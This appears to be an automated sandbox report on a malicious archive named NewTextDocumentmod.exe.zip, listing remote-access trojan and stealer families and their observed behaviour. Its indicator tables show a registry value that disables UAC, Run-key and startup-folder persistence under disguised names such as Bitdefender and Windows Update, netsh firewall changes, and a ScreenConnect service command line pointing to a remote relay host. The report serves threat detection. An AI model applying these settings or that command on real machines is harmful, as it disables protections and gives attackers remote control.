Analysis Overview
SHA256
672ad2d52af206cc63cebe2c801181d3b406aae5891cc57bdaafd5eea3d61fe6
Threat Level: Known bad
The file NewTextDocumentmod.exe.zip was found to be: Known bad.
Malicious Activity Summary
NanoCore
Quasar payload
Xworm
Detect Vidar Stealer
Xred
Vidar
Xred family
AsyncRat
UAC bypass
Detect Xworm Payload
Remcos family
Remcos
Vidar family
Xworm family
Asyncrat family
Nanocore family
Quasar family
Quasar RAT
Async RAT payload
Adds policy Run key to start application
Command and Scripting Interpreter: PowerShell
Sets service image path in registry
Disables Task Manager via registry modification
Downloads MZ/PE file
Modifies Windows Firewall
Reads user/profile data of web browsers
Executes dropped EXE
Drops startup file
Loads dropped DLL
Checks computer location settings
Event Triggered Execution: Component Object Model Hijacking
Adds Run key to start application
Checks whether UAC is enabled
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Drops file in System32 directory
Suspicious use of SetThreadContext
Boot or Logon Autostart Execution: Authentication Package
Enumerates processes with tasklist
Drops autorun.inf file
Drops file in Windows directory
Drops file in Program Files directory
System Location Discovery: System Language Discovery
Unsigned PE
Event Triggered Execution: Netsh Helper DLL
Program crash
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
Suspicious use of FindShellTrayWindow
Enumerates system info in registry
Suspicious behavior: AddClipboardFormatListener
Scheduled Task/Job: Scheduled Task
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Runs ping.exe
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
Suspicious behavior: GetForegroundWindowSpam
Uses Task Scheduler COM API
Modifies data under HKEY_USERS
Modifies registry key
Delays execution with timeout.exe
Suspicious behavior: EnumeratesProcesses
Modifies system certificate store
Suspicious use of SetWindowsHookEx
Checks processor information in registry
Uses Volume Shadow Copy service COM API
Modifies registry class
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-01-26 00:01
Signatures
Xred family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-01-26 00:01
Reported
2025-01-26 00:04
Platform
win7-20240903-en
Max time kernel
132s
Max time network
150s
Command Line
Signatures
AsyncRat
Asyncrat family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NanoCore
Nanocore family
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Remcos
Remcos family
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Vidar
Vidar family
Xred
Xred family
Xworm
Xworm family
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Adds policy Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" | C:\ProgramData\Bitdefender\$77-Bitdefender.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\ProgramData\Bitdefender\$77-Bitdefender.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Disables Task Manager via registry modification
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\ScreenConnect Client (0cef7d10d8f459fc)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (0cef7d10d8f459fc)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=mail.mindfulinvoice.online&p=8041&s=64840446-9df6-4c65-8411-6e7dc5c317a5&k=BgIAAACkAABSU0ExAAgAAAEAAQBBzfcAyYpoA9s86t45oTU7RBr4d3j4wo7ZWaxqW1gXVfaaoS%2bfd0k%2bPJKuwjzsEUcR0STNhshdEUFtsJUgTCaM2RxVswQODfRB%2fxy8spQ2LWWZZewzTdxJbjosBiXV2QpUCcfCmF5yx2%2fO4iVCF7r%2bUlzDG93NmkPtCrZC9yxqlnxALMX%2bF%2faXCCBkyDmMu3o22AbtP3XzZdSzxk8RbscXClS7evLV%2bxau13F1YFn%2baxZ7QaXuHbPv1tE2Bs26tkj%2fE18oOxpgof0OaK2Jy%2bP9WIy8ymeDPQIfocdTFuAek5wZ3lNpFAcbox7NXzIde9yf0dLrOLPA36Dg%2fHz05hjY&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAA10uxErlupkG5x0OI0LD9GgAAAAACAAAAAAAQZgAAAAEAACAAAACf55AjgxQWYDl6hetgPTS1%2bFUPHtkbCi%2b09QRjV2eDIAAAAAAOgAAAAAIAACAAAADWrAOL4BMPtrjaYIBA2Wq%2fVLw2kgJdEtiyEf3xyH%2bIVqAEAAAv%2b5XbAC%2bay6Hh4phaIEZpucD0pi5LDxu8JYopvUVRPfL6%2fnR%2fKy%2bKwEEJIcRikDK%2fHrZj9cLi4ckXIrAXeqJI4RQUyD2n2RB6IgjFBgXQQAylwyOaNvB2wv74WE2GSGS5RW7TDM1RcEEt2%2fio2rPRS%2fzWXldf0vDAGDCXdKr3JMNGNiFG%2bBAlNz7NOHJjHj0f7XIGC27%2bUwWSdijqtMYkzFlYQI7%2b1vvdlIyQlIrUC9Qw%2fEVGE1am1dL2PKuoQMuL5iKM78a%2fsLiJ0462nAixfTAgWoIT%2fMTjvYyY5YIMqbbL3qgODCgY82SNNoGtjCkjbb54VUfvEjGpm9kCRskkQyATanLYCop2i2OQXFBIj6%2bzE4Ad6vmXrTUphfgY%2bkxPIeZSqZschXkFMnSbgwuzwrYJhVZDSk6pVeIjRXzJCEECZIaG2W6fr0RMgBVTJ%2ba%2b7OOhRaUuwOhhs0tRK8HuUGdvvq4uLyJLyi4c0LlhR4om2sc03BYdlgDrh786fTEaJ34zFKcdPqnZ%2bAZjTMEl1fJm6qL3eDDww42VXJ7E0rWdHj2cs6JNXwJhar5p%2fcc1cp8ZmJK5GdpLnbmhv3cBgNRD5dhip8GrWXxN9TZooIZEc38SI%2fVfW9TsyQbQapdwLc%2bI0dmke8FtFWB4QRwGRgJLNAVytKJqEti36YFuhuAD8EXR4GUHN9BzHi0Nkc6sVxuMX1gA38RlbrP7ZINCwXTBhNHWkyNV6BZEfJWCy6mPBYZN7TkVsMFGpzgRDshRrEhzORcim9m3Fig8%2bwZlR9oJ4pXZ2VXckBm1Og5mpJJa7mzZuO9WieVxfeR3JfBcMbMFhLV21nCzoKVFR%2f2546uQAMZJLbwE7T7yZ150DokywDAsGW0RrXEItUPOx6lLMTT4Id5FtDX9A752412V0%2fAJnsyOsN9VdFQC46wXLCuF0yt4jNPOIjpyC4PN9kfcwHaAyye7%2fL6S%2bgn5YcwaE11vpQOrUBUyAS%2bzti%2bRAu6jyQ9VB%2fDemOyMX0m5xnAyYykOcPj8UBqJCfM2IVKwFgxNXBFKFYeFbTCwV8zxTJgnHnxaKvZWrGrl1yHWi1QGnLI2FG3D%2fOlnA5LpVsWrTfUF4sMVbEk%2f%2fFQwZIUzxDV3d5ngX8YmUiGa6%2blLoUL4HEjpoGqY229U5k5Z2V9ekJ4%2f9kxMr6QoHEyPfztw3idsxZMwVM4G6cvhfYV5ViQIVaMGpB0zcxu66YDC4k%2fGx4TKUAzxWp0rIaB2JNrY1K1wHReQfISyng76Qtr%2bakfTPpppKThcJ1DKcihcrpTQKwhCSSLR3S2GkpCfno2mW%2bBmaYA44dv%2f6y0SAlzpYOsReZYbqPzr6ZZPm8xFjCK5aSbV8S9E5Z6LzGBZ0aDuRRFMShOLu9DZ%2f8uWLu47rMzOZnywOjYNT4sDM8u6%2fOs45xNY5VP4nD9S18%2fOr40HRhWsJS43VmNinW%2fL93DBMr2JrO3jtOW%2by0U8RFgPCW41fOlpXCwUpgfEidsv5s6niKUPnZLUAuD1Sm31AJD7BEhEh2SIY3oqC6A9kBDVcF8ooxWqycRrsOldQ%2ff%2fqWaXuEAAAACKUSN5Kh0v1O4kC4Is4FuSvGAdooFKdhtoY2dmnBaiPQ9XIcF9lo%2bgNGhAqZjFhe62I8sjHJXNnQTKW42xXncf&c=zoom&c=zoom-invite.com&c=&c=&c=&c=&c=&c=\"" | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Enalib.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ef9410a92d1077d89c94b9208aa74f96Windows Update.exe | C:\Users\Admin\AppData\Roaming\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ef9410a92d1077d89c94b9208aa74f96Windows Update.exe | C:\Users\Admin\AppData\Roaming\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HasInfo.vbs | C:\Users\Admin\AppData\Local\Temp\a\Update.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Roaming\server.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network.lnk | C:\Users\Admin\AppData\Local\Temp\a\Network.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network.lnk | C:\Users\Admin\AppData\Local\Temp\a\Network.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Enalib.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Roaming\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SCSI Host = "C:\\Program Files (x86)\\SCSI Host\\scsihost.exe" | C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\Network = "C:\\Users\\Admin\\AppData\\Roaming\\Network.exe" | C:\Users\Admin\AppData\Local\Temp\a\Network.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SCSI Host = "C:\\Program Files (x86)\\SCSI Host\\scsihost.exe" | C:\Users\Admin\AppData\Local\Temp\a\jij.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" | C:\ProgramData\Bitdefender\$77-Bitdefender.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" | C:\ProgramData\Bitdefender\$77-Bitdefender.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\a\jij.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\L: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
